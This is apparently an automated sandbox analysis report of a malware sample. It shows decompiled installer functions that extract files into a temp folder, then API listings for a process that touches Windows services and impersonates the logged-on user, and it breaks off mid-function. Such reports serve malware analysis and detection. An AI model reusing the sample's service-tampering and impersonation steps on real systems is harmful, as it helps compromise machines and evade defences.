GetCurrentThreadId.KERNEL32 ref: 002F719A
GetTickCount.KERNEL32 ref: 002F71A3
QueryPerformanceCounter.KERNEL32(?), ref: 002F71B8

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 1351c7f8d77e79639a957ccb55f1a3a24988525161f3b049d9b6c07ac66b6bae
Instruction ID: 98aaec9db3830014d6f48058827663c083f437985fdda28c447c78c4de84cf3f
Opcode Fuzzy Hash: 1351c7f8d77e79639a957ccb55f1a3a24988525161f3b049d9b6c07ac66b6bae
Instruction Fuzzy Hash: 1E110D71D15208DBCB10DFB8EA4CAAFF7F4EF48365F914469D909D7210DA349A14CB41

Uniqueness

Uniqueness Score: -1.00%

Function 002F19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E002F19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x2f8004; // 0x404cc811
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E002F43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x2f9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E002F6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x002f19e0
0x002f19e0
0x002f19eb
0x002f19f2
0x002f19f9
0x002f19fc
0x002f1a01
0x002f1a2a
0x002f1a2e
0x002f1a3e
0x002f1a4f
0x002f1a62
0x002f1a6a
0x00000000
0x002f1a03
0x002f1a06
0x002f1a20
0x002f1a20
0x002f1a08
0x002f1a08
0x002f1a14
0x00000000
0x002f1a16
0x002f1a18
0x002f1a70
0x002f1a72
0x002f1a72
0x002f1a14
0x002f1a06
0x002f1a81

APIs

EndDialog.USER32(?,?), ref: 002F1A18
GetDesktopWindow.USER32 ref: 002F1A24
LoadStringA.USER32(?,?,00000200), ref: 002F1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 002F1A62
MessageBeep.USER32(000000FF), ref: 002F1A6A

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 9d6717db8be63dd5523b90d1a379ebcf3204d3fde09bf96319d690339ba746e7
Instruction ID: fbf9875b0367e6b504e2b02ebe975c393bbcfd063959f22beb0ecc4318286b75
Opcode Fuzzy Hash: 9d6717db8be63dd5523b90d1a379ebcf3204d3fde09bf96319d690339ba746e7
Instruction Fuzzy Hash: 3111C27151010D9BCB00EF64ED0CABEB7B8EF09390F504174F61A92190CA70AE21CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002F63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E002F63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x2f8004; // 0x404cc811
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E002F1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
				E002F658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x2f9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x2f9124 = 0x80070052;
					_t37 = 0;
				}
				return E002F6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x002f63cb
0x002f63d2
0x002f63d8
0x002f63ea
0x002f63f3
0x002f6401
0x002f6402
0x002f6410
0x002f6415
0x002f6433
0x002f6438
0x002f6449
0x002f6463
0x002f646d
0x002f6477
0x002f6477
0x002f647a
0x002f643a
0x002f643a
0x002f6444
0x002f6444
0x002f6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F647A

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F63EB

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 1065093856-3249786385
Opcode ID: 027030dc8f4ef8f56dfcaa6acc3d3b5c91e69db031e677c8fcb6635b130cffa7
Instruction ID: 3fe9fb738710593e4eb9d1ab77dace0bc7ba19142b71f57351932f30463b0b01
Opcode Fuzzy Hash: 027030dc8f4ef8f56dfcaa6acc3d3b5c91e69db031e677c8fcb6635b130cffa7
Instruction Fuzzy Hash: 1F21C671A1011DABD720DF65EC89FFBB368EB453A4F104179E689A3180DAB06D94CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002F47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E002F1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x2f91e0; // 0x2bc7b60
						 *(_t34 + 4) = _t11;
						 *0x2f91e0 = _t34;
						return 1;
					}
					_t25 =  *0x2f8584; // 0x0
					E002F44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x2f8584; // 0x0
				E002F44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x002f47e8
0x002f47f0
0x002f47f4
0x002f480f
0x002f4811
0x002f4814
0x002f4814
0x002f4816
0x002f4817
0x002f4829
0x002f482b
0x002f482f
0x002f484f
0x002f4852
0x002f4855
0x002f4855
0x002f4857
0x002f4858
0x002f4860
0x002f4865
0x002f486a
0x002f486f
0x00000000
0x002f4876
0x002f4831
0x002f4841
0x002f4847
0x002f480b
0x00000000
0x002f480b
0x002f47f6
0x002f4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,002F4E6F), ref: 002F47EA
LocalAlloc.KERNEL32(00000040,?), ref: 002F4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 002F4847

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F4851

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 359063898-3249786385
Opcode ID: d3e0ad0d23ffd4ceaeeaa666982dc0dffe5d74696569ac6c7625d029bfb7efd8
Instruction ID: ec8c6f72fb40adbc9cfbefe8177ea4ddc94b23dde0fa89c577da95b67ec283e1
Opcode Fuzzy Hash: d3e0ad0d23ffd4ceaeeaa666982dc0dffe5d74696569ac6c7625d029bfb7efd8
Instruction Fuzzy Hash: F91136B82146066FE714AF24AC0CF73BB5AEB813E0B048538EB46D7340DAB59C12CA20

Uniqueness

Uniqueness Score: -1.00%

Function 002F3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x002f368c
0x002f368f
0x002f3691
0x002f369f
0x002f36a7
0x00000000
0x00000000
0x002f36ba
0x00000000
0x002f36bc
0x002f36bc
0x002f36c0
0x002f36cb
0x002f36c2
0x002f36c4
0x002f36c4
0x002f36da
0x002f36e0
0x002f36e6
0x00000000
0x00000000
0x002f36e6
0x00000000
0x002f36ba
0x002f36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 002F369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36B2
DispatchMessageA.USER32(?), ref: 002F36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36DA

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 2baeb8d99d8a05bf946c2581984ff960a80886ea6af05976fae303d9148fe307
Instruction ID: 54499a6accb4020d47292eb23693384c0da0ab070555a13a605f9fd14104f43b
Opcode Fuzzy Hash: 2baeb8d99d8a05bf946c2581984ff960a80886ea6af05976fae303d9148fe307
Instruction Fuzzy Hash: 6C01A77291021977DB308BA66C4CEFFB67CEBC5BA0F000139FA09E2180D560C650C664

Uniqueness

Uniqueness Score: -1.00%

Function 002F65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E002F65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x002f65e8
0x002f65ed
0x002f65ef
0x002f65f2
0x002f65f4
0x002f65f4
0x002f65f6
0x002f65f7
0x002f6608
0x002f6611
0x002f6618
0x002f661c
0x00000000
0x00000000
0x002f660e
0x002f6623
0x002f6625
0x002f663b
0x002f663b
0x002f663d
0x002f6641
0x002f6610
0x002f6610
0x00000000
0x002f6610
0x002f6644
0x002f6647
0x002f6647
0x002f6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,002F2B33), ref: 002F6602
CharPrevA.USER32(?,00000000), ref: 002F6612
CharPrevA.USER32(?,00000000), ref: 002F6629
CharNextA.USER32(00000000), ref: 002F6635

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 5cc911c3182cf2d887b6fa39b697dfb1de5a65a22673f92f7ea65a629b4bece7
Instruction ID: 4acebb642a687f019e7216b6b0030b773cfa50a9d3ebb032ce678763a4fefcf2
Opcode Fuzzy Hash: 5cc911c3182cf2d887b6fa39b697dfb1de5a65a22673f92f7ea65a629b4bece7
Instruction Fuzzy Hash: ECF0F9714141566EE7321F285CCC8B7FF9CCB872E4B1A01BFE599D2101D6590D16C761

Uniqueness

Uniqueness Score: -1.00%

Function 002F69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x2f81f8 = E002F6C70();
				__set_app_type(E002F6FBE(2));
				 *0x2f88a4 =  *0x2f88a4 | 0xffffffff;
				 *0x2f88a8 =  *0x2f88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x2f8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x2f851c; // 0x0
				 *_t5 = _t12;
				_t6 = E002F7000();
				if( *0x2f8000 == 0) {
					__setusermatherr(E002F7000);
				}
				E002F71EF(_t6);
				return 0;
			}

0x002f69b7
0x002f69c2
0x002f69c8
0x002f69cf
0x002f69d8
0x002f69de
0x002f69e4
0x002f69e6
0x002f69ec
0x002f69f2
0x002f69f4
0x002f6a00
0x002f6a07
0x002f6a0d
0x002f6a0e
0x002f6a15

APIs

Part of subcall function 002F6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 002F6FC5

__set_app_type.MSVCRT ref: 002F69C2
__p__fmode.MSVCRT ref: 002F69D8
__p__commode.MSVCRT ref: 002F69E6
__setusermatherr.MSVCRT ref: 002F6A07

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 92116ab681be5d325e4a541d75da0747dd7045d169ae2f66a4311d0443571811
Instruction ID: 9a46bc3eaa383cd3606c9e09be2f4c9bcf41b73ab86ae1799aa0bcf0cafb315c
Opcode Fuzzy Hash: 92116ab681be5d325e4a541d75da0747dd7045d169ae2f66a4311d0443571811
Instruction Fuzzy Hash: 41F0F8B02183099FD714AB34BD0E635BB61FB047F1B110639E966862E1CF3A8564CE15

Uniqueness

Uniqueness Score: -1.00%

Function 002F6952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F6952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x2f5760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}

0x002f695b
0x002f6960
0x002f6963
0x002f6966
0x002f6969
0x002f696c
0x002f6972
0x002f6987
0x002f699f
0x002f699f
0x002f6987
0x002f69a7

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W/,?,00000000,002F5760,?,A:\), ref: 002F697F
MulDiv.KERNEL32(?,?,00000400), ref: 002F6999

Strings

`W/, xrefs: 002F6972, 002F6975

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W/
API String ID: 1705453755-3921536248
Opcode ID: 473646e679e066438ee0f2e7fdb649029d179975f2045e23d96718aadaff5f63
Instruction ID: e07101e86c10292bb6951d316be17307febf11e0190d2bdd5fe8f91875a0a073
Opcode Fuzzy Hash: 473646e679e066438ee0f2e7fdb649029d179975f2045e23d96718aadaff5f63
Instruction Fuzzy Hash: EAF0E7B6D1022CBBCB11DFE89848AEEBBBCEB48750F1041A6A614E2240D6719A108B91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mx8896IL.exePID: 5584, Parent PID: 5456COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF9A56C1B10 Relevance: 2.0, APIs: 1, Instructions: 542
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32 ref: 00007FF9A56C1FD1

Memory Dump Source

Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: 274da5e72f4615d634026e79fe3c698fbc91ac20477656acfd1bdc9b634d2b6f
Instruction ID: a5621285e12717bbe4939f02cb41bd3c919c496d6c812b1f2b9a09fd1c4787c9
Opcode Fuzzy Hash: 274da5e72f4615d634026e79fe3c698fbc91ac20477656acfd1bdc9b634d2b6f
Instruction Fuzzy Hash: 3FF1B930A18A4D4FEB68DF28D8467F977D0FB59710F10427EE88EC7281DA75A9818782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A56C077D Relevance: 1.8, APIs: 1, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FF9A56C0989

Memory Dump Source

Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: db296b7349d1faa866909c87ab291ac9155d028dab577f6da533939dca49364c
Instruction ID: b6fcbc3641a79a22663f739a2fea15b6971ee3d4d77b26db63588ca99c56da9b
Opcode Fuzzy Hash: db296b7349d1faa866909c87ab291ac9155d028dab577f6da533939dca49364c
Instruction Fuzzy Hash: 3F916030A19A4D8FEBA8DF28D8557E977D1FF59310F00817AE84DC7291CB75A941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A56C0C34 Relevance: 1.7, APIs: 1, Instructions: 207
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32 ref: 00007FF9A56C0D99

Memory Dump Source

Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 2ff79beb8c1191a793af9bf1a47e4d8020303cba33896bd2081a6974f62da873
Instruction ID: 0642617bc7615362f0863f57fb47b915bc5469a0da98de187b4b0b090188f4f2
Opcode Fuzzy Hash: 2ff79beb8c1191a793af9bf1a47e4d8020303cba33896bd2081a6974f62da873
Instruction Fuzzy Hash: DD518470A18A8D4FEB58EF28D8467F977E1FB59315F10412EE84EC3292DE75E8418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A56C0B2D Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF9A56C0BFA

Memory Dump Source

Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c956444aded82a9fdbf7e86dd8d067ef3385b15934404fc66a08716894a9ef16
Instruction ID: 7f9d3970ae01d87c00142fe0ee89e84998a93406423452ce630ed09564a2fe1e
Opcode Fuzzy Hash: c956444aded82a9fdbf7e86dd8d067ef3385b15934404fc66a08716894a9ef16
Instruction Fuzzy Hash: DC41E331E0DA484FDB68DB9898497FDBBE0EF56721F04413FD08ED3252CEA5A8058B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A56C1A1D Relevance: 1.6, APIs: 1, Instructions: 143
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32 ref: 00007FF9A56C1ACB

Memory Dump Source

Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 9c19b8b8701536f3ae09eaf7b9ac1ac54a8d16a68a8f0a94d189db6acd566c17
Instruction ID: ab3a710c777db254967a443a1b565b4f8e94af3fe771bd76abce06df6ac64d2e
Opcode Fuzzy Hash: 9c19b8b8701536f3ae09eaf7b9ac1ac54a8d16a68a8f0a94d189db6acd566c17
Instruction Fuzzy Hash: 3B41D631E0CA584FDB18EB9CA8457FD7BE1EF56721F04417EE08ED3292CA6568068781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A56C1760 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 00007FF9A56C17F5

Memory Dump Source

Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 0d5ca02afb200b3450b4474be3cea7b8c56e9f6c83023907501584993a085944
Instruction ID: d78455a7be55d75edc3959bf88c5fb5cfe1ed3fbeeda66ef4daf974a049d6772
Opcode Fuzzy Hash: 0d5ca02afb200b3450b4474be3cea7b8c56e9f6c83023907501584993a085944
Instruction Fuzzy Hash: 6C310831A0CA4C8FEB58DF6898057F9BBE0FB56321F00416FD089C3592DB75A456CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9A56C108A Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF9A56C1145

Memory Dump Source

Source File: 00000004.00000002.335073319.00007FF9A56C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff9a56c0000_mx8896IL.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ee339fc8103ad06008a6151abefa0326835051b69bd49904954943a83747687f
Instruction ID: f657fe33ed6cb9ef76ad852a8af7dd10ca5d0c689a6253cb1bff656f19aaabb1
Opcode Fuzzy Hash: ee339fc8103ad06008a6151abefa0326835051b69bd49904954943a83747687f
Instruction Fuzzy Hash: 8931F63090C78C5FDB0ADB6888157E97FF0EF57320F04429FD089C35A2DA656856CB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ns5251Ks.exePID: 5660, Parent PID: 5456COMMON

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
